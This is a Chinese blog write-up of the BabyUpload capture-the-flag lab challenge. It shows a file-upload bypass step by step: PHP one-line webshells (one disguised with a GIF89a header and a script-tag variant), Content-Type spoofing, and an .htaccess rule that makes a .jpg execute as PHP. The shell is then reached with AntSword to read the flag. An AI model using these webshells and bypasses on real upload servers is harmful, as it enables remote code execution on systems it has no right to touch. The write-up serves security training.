首页 > 其他分享 >[GXYCTF2019]BabyUpload

[GXYCTF2019]BabyUpload

时间:2024-01-12 16:22:39浏览次数:31  
标签:文件 BabyUpload 木马 php 上传 GXYCTF2019

[GXYCTF2019]BabyUpload

VbopV8oITVrmVxfgl7m216LdB2cXUz0ATXRrpzviz3I

打开靶场看到个上传文件的选项,应该是上传文件漏洞

上传个一句话木马文件尝试

<?php eval($_POST['cmd']);?>

提示不能带有php的后缀

xUGXT4IawvjNVGDm4F_6Fl4gU6m7W17Gm0kkfalH3tM

改成jpg后缀,提示“上传类型也太露骨了吧!”

lhofAr1SHgSle84irZUHTm5D2FPLXU9kzFIOuFbi0CQ

修改了Content-Type为image/jpeg还是不行

6b3WwFK8OW-UCaPCFvJPB1T5osW_FfzDP92w56jDaqk

换了一种一句话木马

GIF89a
<script language='php'>@eval($_POST['cmd'])</script>

此时上传成功

Dx9Y3KADP--mHJKwZwF5M3dUGIS1IwWCI_rBz1o1eKM

但是图片无法解析为php

使用.htaccess将文件解析为php

<FilesMatch "d.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

这里注意还是需要修改下Content-Type,否则还是会提示上传类型露骨

-ax6rOcU1HIzm49oTyuXIh31X2Dafr1KLttZFecRZrg

然后再上传一句话木马

yx0bF_HWYwvN_MkHkl1mLz7ykKvdDSsIfdmZ1Oq9IRA

此时通过蚁剑连接,在根目录下找到flag

71x23U4ATlq2Ga50X0qx3vpXePna6Olx_J2xJrGg3Hc

RLIU76K4_xvKmlQElkJEdaVhswkS-52Wl14dPSe4LF4

标签:文件,BabyUpload,木马,php,上传,GXYCTF2019
From: https://www.cnblogs.com/fishjumpriver/p/17961031

相关文章

  • [GXYCTF2019]Ping Ping Ping 1
    [GXYCTF2019]PingPingPing1审题由标题和内容,我们可以想到Linux的命令执行。并且由内容/?ip=,看出用GET注入ip变量来读取flag知识点Linux的命令执行,空格的绕过知识点详解在Linux中,竖线符号"|"和分号符号";"具有不同的作用。竖线符号"|"(管道符号):在Linux......
  • 【?】Web_BUUCTF_WriteUp | [GXYCTF2019]Ping Ping Ping
    题目分析ping一个任意ip:拼一个命令试试:看来是命令执行漏洞,直接查看flag.php,发现存在空格过滤:尝试绕过空格过滤:还有{}符号过滤。过滤了flag关键字,尝试绕过:过滤了单双引号。\符号、\$+数字、\$+@没有用。变量拼接没有输出。看看index.php:......
  • [GXYCTF2019]BabyUpload
    题目附件如下。<?phpsession_start();echo"<metahttp-equiv=\"Content-Type\"content=\"text/html;charset=utf-8\"/><title>Upload</title><formaction=\"\"method=\"post\"enctype=\......
  • [GXYCTF2019]禁止套娃
    原理.git泄露,githack获取源码无参RCE执行解题过程进入靶场,每看到有用的信息,那就只能目录扫描了,扫到了.git目录,就用githack获取源码<?phpinclude"flag.php";echo"flag在哪里呢?<br>";if(isset($_GET['exp'])){if(!preg_match('/data:\/\/|filter:\/\/|php:\/......
  • [GXYCTF2019]Ping Ping Ping 1
    原理RCE命令执行的多种绕过姿势解题过程进入靶场提示要传递参数ip那就传递一下127.0.0.1,结果正常试试进行拼接,试了127.0.0.1&&ls或者127.0.0.1&ls都不行,,,直到用;做连接符才可以payload:127.0.0.1;ls发现有index.php和flag.php文件,猜测flag应该在flag.php内接着尝试读取......
  • Buuctf——[GXYCTF2019]BabySQli
    本题目是一道联合注入进入页面后发现只有一个登录框。知识点unionselect联合查询union拼接的两个查询语句查询字段数必须一样多当其中一个查询结果为空时,不影响另外一个语句的查询结果联合注入核心是使用拼接的select语句同时使原查询语句结果为空来覆盖原查询结果,从而实......
  • [GXYCTF 2019]BabyUpload
    [GXYCTF2019]BabyUpload题目来源:nssctf题目类型:web涉及考点:文件上传1.题目要求直接传马,先试试`muma.php`不行,再试试muma.jpg:提示说明一句话木马内不能有php标志(即<?),我们看看响应标头,使用的是php5.6.23因此可以构造<scriptlanguage='php'>eval($_POST['r00ts']);<......
  • [NISACTF 2022]babyupload
    [NISACTF2022]babyupload题目来源:nssctf题目类型:web涉及考点:文件上传1.题目说传一个图片文件,那我们传个muma.jpg看看但是上传失败:回去检查一下源代码,发现有/source直接访问下载了一个压缩文件,解压之后是一个py文件,随后进行代码审计2.代码审计fromflaskimportFl......
  • [GXYCTF2019]Ping Ping Ping
    [GXYCTF2019]PingPingPing题目来源:buuctf题目类型:web涉及考点:命令执行1.题目页面如下:我们将其作为参数传入,/?ip=127.0.0.1,回显如下:接下来通过命令行查看目录:/?ip=127.0.0.1;ls2.发现了flag.php,直接查看/?ip=127.0.0.1;catflag.php发现空格被过滤了,我们采取以下......
  • BUUCTF:[GXYCTF2019]禁止套娃
    https://buuoj.cn/challenges#[GXYCTF2019]%E7%A6%81%E6%AD%A2%E5%A5%97%E5%A8%83.git泄露,使用GitHackindex.php<?phpinclude"flag.php";echo"flag在哪里呢?<br>";if(isset($_GET['exp'])){if(!preg_match('/data:\/\/|fil......